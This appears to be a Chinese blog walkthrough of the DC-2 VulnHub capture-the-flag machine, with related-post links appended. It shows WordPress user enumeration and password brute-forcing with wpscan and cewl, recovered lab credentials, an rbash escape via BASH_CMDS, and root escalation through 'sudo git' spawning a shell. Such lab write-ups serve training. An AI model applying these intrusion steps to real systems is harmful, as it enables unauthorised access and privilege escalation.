DC-2靶机复现

于 2024-08-12 00:24:10 发布
阅读量111 收藏 1
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52956666/article/details/141114711
版权

靶机设置

设置靶机为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.135

目录扫描

80端口开放,进行目录扫描

dirsearch 192.168.112.135

访问浏览器(flag1)

发现无法访问,在hosts中添加

再次访问,发现访问成功

点击flag,发现flag1

目录拼接

拼接/wp-admin

发现wordpress登陆页面

wpscan --url http://dc-2 --enumerate u枚举用户(记得kali中也将hosts文件绑定)

发现了三个用户:admin jerry tom

cewl http://dc-2/ > 1.txt

cat 1.txt

生成密码文件

进行密码破解

wpscan --url http://dc-2 --passwords 1.txt

出来admin都破解成功

账号:jerry

密码:adipiscing

账号:tom

密码:parturient

登陆后台(第二个flag)

输入账号密码,登陆成功

发现了第二个flag

flag提示可以进入第二个入口,尝试ssh

ssh连接(第三、四个flag)

使用tom用户连接,连接成功

ssh tom@192.168.112.135 -p 7744

发现好多命令都被限制无法使用

发现echo可以使用,进行 rbash 绕过

echo $PATH

echo /home/tom/usr/bin/*

# 利用bash_cmds自定义一个shell

BASH_CMDS[a]=/bin/sh;a

# 添加环境变量

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

再次使用发现可以使用

ls

cat flag3.txt

flag中提醒我切换用户,我们切到jerry用户

find / -name *flag*

cd /home/jerry/

ls

cat cat flag4.txt

发现了flag4文件

提权

sudo -l查看免密操作

尝试sudo提权

sudo git -p help config

!/bin/sh

提权成功

CcHKer
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub-DC-1 靶机复现完整过程
Continuejww的博客
07-19 235
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec欢迎指正!
DC-2靶机复现(自己渗透的记录)
hqhhhh的博客
02-20 903
环境搭建参考我的DC-1靶机搭建的方法,靶机的下载同样也在VulnHub中能找到。安装与环境的配置同样跟DC-1完全一直,只需要修改网络连接方式为NAT,使其与你的攻击机处于同一局域网内即可。
靶机练习:DC-2靶机复现
m0_63755076的博客
09-02 329
windows中hosts文件的位置:C:\windows\system32\drivers\etc。可以使用kali中的dirb或nikto命令进行目录扫描也可使用dirsearch。, :就自动变成了!再输入/bin/bash完成提权。发现cat指令用不了,vi可以使用,发现flag3。根据提示大概在git上,查看git的配置:(两种方。发现三个用户,保存到文件(user.txt)。现在用户名和密码都有了,开始尝试暴力破解,发现80端口和ssh的7744端口。访问一下发现的目录:靶机地址+网址。
靶机练习-DC-4靶机复现
m0_63755076的博客
09-21 1061
hydra -l jim -P /root/桌面/pass ssh://192.168.用的darkweb2017-top10000.txt,爆破出来密码是happy。发现有charles,jim和sam可以登录,查看三个账户的家目录。发现46996.sh脚本可以提权,将其发送到DC-4中。发现开放了22和80端口,访问80端口。2.使用nmap扫描靶机开放的端口(发现有exim4命令,可以提权。执行46996.sh文件。
DC-1靶机复现
weixin_43980115的博客
03-21 1502
下载安装DC-1,并启动DC-1 下载地址:https://www.five86.com/downloads/DC-1.zip 下载完解压后会有一个以.ova为后缀的文件,直接在VM种用”打开虚拟机”,在设置中修改网络适配器为NET模式。 在这里记一下DC-1的MAC地址,等下用的到。 启动DC-1时开机就好,不用输用户名和密码登录(你也不知道呀) 打开kali,查看kali的IP地址和子网掩码 因为DC-1和kali现在属于同一个网段,查看kali的IP和子网掩码是为了获得DC-1的网络号
DC-1靶机渗透复现(详细教程)
hqhhhh的博客
10-09 321
DC-1靶机渗透实战教学,非常详细!包学包会
DC-2靶机详解
苏生要努力
03-03 1347
写写自己打DC-2的过程使用工具DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/
DC-3靶机复现(过程详细,一看就会)
hqhhhh的博客
02-21 1593
这个DC-3的靶机主要是利用Joomla这个框架存在的sql注入漏洞拿到后台管理员的账户和密码,在后台管理的页面又发现一个可以执行php,我们就利用了反弹shell,但是在提权这里我们遇到一点问题,不是之前的suid或者sudo提权了,这里需要系统漏洞提权。
靶机练习:DC-3靶机复现
m0_63755076的博客
09-21 1094
这一次,只有一面旗帜,一个入口,没有任何线索。要获得flag,您显然必须获得 root 权限。发现是Ubuntu16.04,使用searchsploit工具查找Ubuntu 16.04的提权漏洞,发现一个“拒绝服务漏洞”,可以用来提权。解压exploit.tar的文件,执行其中的compile.sh和doubleput的文件。得到加密的密码,将加密的密码保存在2.txt,然后用john进行破解。查看解压后的目录,发现有两个tar的文件。查看一下42033.txt文件,在。发现利用方式,下载链接中的文件,
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
复现DC-1靶机.pdf
03-22
复现DC-1靶机.pdf
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8376
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
mediapipe-0.8.8.1-cp39-cp39-manylinux_2_17_x86_64.whl
08-11
mediapipe-0.8.8.1-cp39-cp39-manylinux_2_17_x86_64.whl
python爱心代码高级
最新发布
08-11
1. 一行代码画爱心 print('\n'.join([''.join([('Love'[(x-y)%4]if((x*0.05)**2+(y*0.1)**2-1)**3-(x*0.05)**2*(y*0.1)**3<=0 else' ')for x in range(-30,30)])for y in range(15,-15,-1)])) 效果图 2. 用turtle库画爱心加文字 import turtle import math turtle.pen() t=turtle t.up() t.goto(0,150) t.down() t.color('red') t.begin_fill() t.fillcolor('red') t.speed(1) t.left(45) t.forward(150) t.right(45) t.forward(100) t.right(45) t.forward(100) t.right(45) t.forward(100) t.right(45) t.forward(250+math.sqrt(2)*100) t.right (90) t
mediapipe-0.8.9.1-cp38-cp38-win_amd64.whl
08-11
mediapipe-0.8.9.1-cp38-cp38-win_amd64.whl
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值